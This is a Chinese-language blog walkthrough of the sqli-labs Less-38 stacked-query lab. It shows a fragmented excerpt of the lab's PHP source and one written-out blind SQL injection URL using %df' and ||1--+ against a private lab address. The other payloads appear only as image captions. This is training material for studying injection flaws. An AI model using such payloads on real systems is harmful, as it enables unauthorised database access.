sqli-Labs————less-38

Less-38

sqli-Labs————less-38_第1张图片

源代码:






Less-38 **stacked Query**



Welcome    Dhakkan
'; printf("Your Username is : %s", $row[1]); echo "
"; printf("Your Password is : %s", $row[2]); echo "
"; echo "
"; } // mysqli_free_result($result); } /* print divider */ if (mysqli_more_results($con1)) { //printf("-----------------\n"); } //while (mysqli_next_result($con1)); } else { echo ''; print_r(mysqli_error($con1)); echo ""; } /* close connection */ mysqli_close($con1); } else { echo "Please input the ID as parameter with numeric value";} ?>



根据以上的SQL语句,可以直接构造payload如下:

明注:

sqli-Labs————less-38_第2张图片

盲注:

http://192.168.11.136/sqli-labs/Less-38?id=-1%df'||1--+

sqli-Labs————less-38_第3张图片

同时,我们也可以使用堆叠注入来实现:

sqli-Labs————less-38_第4张图片


你可能感兴趣的:(【信息安全】,【渗透测试实战1】,———Sqli-labs实战)